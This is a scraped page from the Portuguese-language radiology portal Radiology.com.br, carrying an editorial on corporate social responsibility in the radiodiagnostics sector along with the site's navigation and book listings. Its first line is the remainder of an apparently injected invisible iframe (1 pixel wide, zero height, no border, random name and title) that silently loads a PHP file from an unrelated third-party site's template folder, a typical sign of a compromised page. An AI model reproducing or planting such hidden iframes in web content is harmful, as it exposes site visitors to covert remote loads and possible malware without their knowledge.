"SagUTeXYne" src="http://aandmcleaning.co.uk/templates/rhuk_milkyway/lite/index.php?out=1328461192" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"> ">
 
No banner in farm
 
INÍCIO| ARTIGOS| EVENTOS | CURSOS | NEGÓCIOS| COMUNIDADES | TÉCNICOS | PACIENTES | SHOPPING

Cadastre-se Editorial Mapa do Site Quem Somos

Submarino

 Cadastre-se
Seja um membro do RADIOLOGY.COM.BR e receba notícias, eventos e muito mais em seu e-mail.

Nome:

E-mail:

Residente em Radiologia?
Sim
Não


 Shopping
TC de Alta Resolução do Pulmão
Técnicas Radiológicas

Radiologia: Perguntas e Respostas: o Pequeno Livro Verde
Radiologia Odontológica

Ultra-Sonografia em Obstetrícia e Ginecologia
Compêndio de Radiologia

Ultra-Sonografia em Obstretrícia e Ginecologia
Segredos em Radiologia

Ressonância Magnética em Ortopedia e Medicina Esportiva
Fundamentos de Radiologia

Fundamentos de Radiologia de Squire
Fundamentos de Radiologia e Diagnóstico por Imagem

CVarredura em Ultra-Sonografia: Princípios e Protocolos
Paul & Juhl: Interpretação Radiológica


 Fale Conosco

Informações Gerais

Comercial


Leia os Editoriais do Radiology.com.br


Responsabilidade Social em Radiologia
Por Décio Ogawa* e Omar Taha**

A questão da responsabilidade social vêm sendo abordada já há alguns anos no meio empresarial e chega ao setor de radiodiagnóstico apoiando-se em duas vertentes distintas:a questão de relacionamento com os clientes e a preservação do meio ambiente.

Para entender este processo é preciso analisar como pode uma empresa se posicionar como responsável socialmente dentro da comunidade. Alguns aspectos são relevantes dentre estes:

1 – Valores e transparência – constitui a adoção e abrangência de práticas como divulgação de crenças, valores e compromissos éticos ,transparência e discussão, com os stakeholders sobre os indicadores usados para avaliar o sucesso do negócio ;

2 – Funcionários e público interno – possibilidade de gestão participativa, benéficos , posicionamento em relação ao trabalho infantil, tratamento dado ao tema diversidade e investimento em desenvolvimento profissional e educação

3 – Meio Ambiente – atuar de forma a realizar um gerenciamento adequado do impacto, melhoria dos processos de gestão ambiental e desenvolvimento de programas de conscientização e educação

4 – Fornecedores – trata do relacionamento da empresa com sua cadeia produtiva e de seu empenho em disseminar conceitos ligados à responsabilidade social entre fornecedores e parceiros

5 – Consumidores e clientes – avalia o tratamento dado aos que compram produtos e serviços da empresa e seu compromisso com o atendimento a eles

6 - Comunidade – inclui questões como o cuidado com os possíveis impactos da atuação da empresa na comunidade; o relacionamento com lideranças locais, voluntariado e investimento social

7 – Governo e sociedade - trata da ética no relacionamento com governos e autoridades, da parceria com órgãos públicos e da preocupação da empresa em ser uma formadora de opinião em seu setor.

Portanto várias são as abordagens possíveis e simultâneas do processo de envolvimento da empresa de radiodiagnóstico no processo de responsabilidade social. Entretanto, sem dúvida alguma a questão do impacto das novas tecnologias sobre o meio ambiente e o relacionamento com os consumidores e clientes devem ser tópicos a serem priorizados.

O primeiro pela questão emergencial que se avizinha com a necessidade de preservação urgente dos mananciais hídricos, depositários dos resíduos tóxicos de vários elementos dentre estes, resultantes do processamento de filmes radiológicos ; a evolução para procedimentos “filmless” certamente representará um avanço significativo neste sentido. Enquanto isso, é de vital importância a conscientização dos consumidores com relação aos sistemas de tratamento dos resíduos que vêm sendo incorporados nas processadoras convencionais e a questão da obrigatoriedade de uso .

O segundo aspecto, não menos importante é o do relacionamento com clientes e consumidores dentro deste setor. Apesar do nosso segmento empresarial em alguns pontos ser menos evoluído em termos gerenciais, com algumas empresas ainda sustentadas por processos de gestão rudimentares, o relacionamento com o clientes é primordial, e o tratamento dado pós venda é de suma importância para credibilidade da empresas, do produto e do serviço oferecido.

Dadas às características operacionais dos produtos e serviços oferecidos dentro do setor radiodiagnóstico, o envolvimento entre empresários e clientes/médicos no caso é bastante positivo na medida em que poderemos passar muitas informações para este público e aprendermos um outro tanto , sustentando assim um relacionamento profícuo que certamente resulta em benefícios aos pacientes.

O empresário no setor de radiodiagnóstico pode e deve se envolver de forma positiva com o clientes/médicos na medida em que oferece um produto e serviço de a qualidade que resulta em valor agregado positivo para toda comunidade. O não reconhecimento deste fato, ou não envolvimento neste tipo de ação deverá empobrecer nossa atuação e levar a depreciação de nossa atividade empresarial junto a este segmento.

Por isso mesmo deverá ser um atitude consciente, voltada sobretudo para um compromisso de responsabilidade social.

*Décio Ogawa é engenheiro e diretor da Macrotec Equipamentos
**Omar taha é médico- radiologista e diretor do Radiology.com.br

Referências Bibliográficas:

1 – “Como ser um Modelo de Cidadania” in: Guia de Boa Cidadania Corporativa – pág 31 – Editora Abril São Paulo 2003
2 – “Primeiros passos em RSE” in Instituto Ethos (http://www.ethos.org.br/docs/conceitos_praticas/primeiros_passos/introducao/introducao.shtml)

 
Editoriais Anteriores
Estado Atual da Radiologia Brasileira 2004
O Sucesso da Jornada Sul
Mamografia: Passado, Presente e Futuro
Ética Médica na Internet
Medicina e Imagem - Expectativas para O Milênio
O E-mail da Dra. Cynthia
Sem Mágicas!
A Missão do Radiology.com.br
A Radiologia e o Mercado de Trabalho
De Liberal a Refém
© 2007 - Radiology.com.br